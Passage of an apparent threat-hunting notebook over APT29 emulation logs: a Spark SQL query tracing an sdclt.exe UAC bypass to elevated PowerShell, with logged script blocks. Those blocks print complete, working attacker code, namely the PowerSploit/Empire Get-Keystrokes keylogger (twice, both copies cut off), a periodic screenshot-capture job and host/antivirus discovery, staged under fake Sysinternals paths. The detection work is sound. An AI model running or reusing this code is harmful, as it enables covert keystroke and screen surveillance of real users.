                [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
            )

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
            $FieldValueArray = [Object[]] @(
                'GetAsyncKeyState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
            $FieldValueArray = [Object[]] @(
                'GetKeyboardState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
            $FieldValueArray = [Object[]] @(
                'MapVirtualKey',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
                [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
            $FieldValueArray = [Object[]] @(
                'ToUnicode',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
            $FieldValueArray = [Object[]] @(
                'GetForegroundWindow',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $ImportDll = $TypeBuilder.CreateType()
        }

        $LastWindowTitle = ""
        $i=0
        while ($true) {
            Start-Sleep -Milliseconds 40
            $gotit = ""
            $Outout = ""
            
            for ($char = 1; $char -le 254; $char++) {
                $vkey = $char
                $gotit = $ImportDll::GetAsyncKeyState($vkey)
                
                if ($gotit -eq -32767) {

                    #check for keys not mapped by virtual keyboard
                    $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                    $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                    $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
                    $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                    $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                    $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                    $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                    $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                    $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                    $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                    $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                    $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                    $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                    $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                    $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                    $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                    $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                    if ($LeftShift -or $RightShift) {$Outout += '[Shift]'}
                    if ($LeftCtrl  -or $RightCtrl)  {$Outout += '[Ctrl]'}
                    if ($LeftAlt   -or $RightAlt)   {$Outout += '[Alt]'}
                    if ($TabKey)       {$Outout += '[Tab]'}
                    if ($SpaceBar)     {$Outout += '[SpaceBar]'}
                    if ($DeleteKey)    {$Outout += '[Delete]'}
                    if ($EnterKey)     {$Outout += '[Enter]'}
                    if ($BackSpaceKey) {$Outout += '[Backspace]'}
                    if ($LeftArrow)    {$Outout += '[Left Arrow]'}
                    if ($RightArrow)   {$Outout += '[Right Arrow]'}
                    if ($UpArrow)      {$Outout += '[Up Arrow]'}
                    if ($DownArrow)    {$Outout += '[Down Arrow]'}
                    if ($LeftMouse)    {$Outout += '[Left Mouse]'}
                    if ($RightMouse)   {$Outout += '[Right Mouse]'}

                    #check for capslock
                    if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

                    $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
                    
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
                    
                    $mychar = New-Object -TypeName "System.Text.StringBuilder";
                    $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                    #get the title of the foreground window
                    $TopWindow = $ImportDll::GetForegroundWindow()
                    $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
                    
                    if ($unicode_res -gt 0) {
                        if ($WindowTitle -ne $LastWindowTitle){
                            # if the window has changed
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                            $Outout = "`n`n$WindowTitle - $TimeStamp`n"
                            $LastWindowTitle = $WindowTitle
                        }
                        $Outout += $mychar.ToString()
                        $Outout
                    }
                }
            }
        }
    }
}

ScriptBlock ID: fa9f2b3a-3f5e-4d3c-93c9-7172cc073add
Path: C:\Program Files\SysinternalsSuite\psversion.ps1 
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-ScreenCapture
# https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/
{
    Start-Job -Name "Screenshot" -ScriptBlock { 
        Write-Host "`nJobPID`n------`n$PID"
        while($true){
            $RandomFileName = [System.IO.Path]::GetRandomFileName(); 
            $Filepath="$env:USERPROFILE\Downloads\$RandomFileName.bmp"; 
            Add-Type -AssemblyName System.Windows.Forms; 
            Add-type -AssemblyName System.Drawing; 
            $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; 
            $Width = $Screen.Width; 
            $Height = $Screen.Height; 
            $Left = $Screen.Left; 
            $Top = $Screen.Top; 
            $bitmap = New-Object System.Drawing.Bitmap $Width, $Height; 
            $graphic = [System.Drawing.Graphics]::FromImage($bitmap); 
            $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size); 
            $bitmap.Save($Filepath); 
            Start-Sleep -Seconds 300
        } 
    }
}

ScriptBlock ID: b91c2ae7-3a03-49df-8d2a-4c42fc79df56
Path: C:\Program Files\SysinternalsSuite\psversion.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
-RECORD 2-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

Query ID:9CFC783B-2DC8-4A3D-AC7B-2DF890827E2E

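# Correlate a suspected UAC bypass (sdclt.exe -> control.exe) with the
# PowerShell script blocks later logged from the elevated session it
# produced.  The query is built inside-out on Security 4688 (process
# creation) events and then pivoted to PowerShell 4104 (script block) events:
#   b: control.exe whose parent is sdclt.exe
#   a: a process created by that control.exe that already runs elevated
#      (MandatoryLabel S-1-16-12288 = High integrity,
#       TokenElevationType %%1937 = TokenElevationTypeFull)
#   d: a child of that elevated process whose image is powershell.exe
#   e: that powershell.exe's NewProcessId with its "0x" prefix stripped
#   f: 4104 events whose ExecutionProcessID, rendered as lowercase hex,
#      equals e, and whose script text mentions $pid
# Note: 4688 NewProcessId is a "0x..." hex string while 4104's
# ExecutionProcessID is numeric, hence the split() / hex() conversions.
# Note: "%$pid%" is a literal LIKE pattern, not a Python or shell variable.
# NOTE(review): every hop joins on PID alone with no time-window constraint,
# so a recycled PID could stitch unrelated events together; scope by time or
# by ProcessGuid/host if the data source offers one.
# All image-name comparisons are lower-cased so a mixed-case path in
# NewProcessName does not silently drop the match.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$pid%"

'''
)
df.show(100, truncate=False, vertical=True)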
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Get-Keystrokes {
<#
.SYNOPSIS
 
    Logs keys pressed, time and the active window (when changed).
    Some modifications for Empire by @harmj0y.
    
    PowerSploit Function: Get-Keystrokes
    Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
    Modifications: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    
.LINK
    http://www.obscuresec.com/
    http://www.exploit-monday.com/
#>
    Start-Job -Name "Keystrokes" -ScriptBlock {
        Write-Host "`nJobPID`n------`n$PID"
        [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

        try
        {
            $ImportDll = [User32]
        }
        catch
        {
            $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
            $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
            $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

            $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
            $FieldArray = [Reflection.FieldInfo[]] @(
                [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
            )

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
            $FieldValueArray = [Object[]] @(
                'GetAsyncKeyState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
            $FieldValueArray = [Object[]] @(
                'GetKeyboardState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
            $FieldValueArray = [Object[]] @(
                'MapVirtualKey',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
                [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
            $FieldValueArray = [Object[]] @(
                'ToUnicode',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
            $FieldValueArray = [Object[]] @(
                'GetForegroundWindow',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $ImportDll = $TypeBuilder.CreateType()
        }

        $LastWindowTitle = ""
        $i=0
        while ($true) {
            Start-Sleep -Milliseconds 40
            $gotit = ""
            $Outout = ""
            
            for ($char = 1; $char -le 254; $char++) {
                $vkey = $char
                $gotit = $ImportDll::GetAsyncKeyState($vkey)
                
                if ($gotit -eq -32767) {

                    #check for keys not mapped by virtual keyboard
                    $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                    $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                    $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
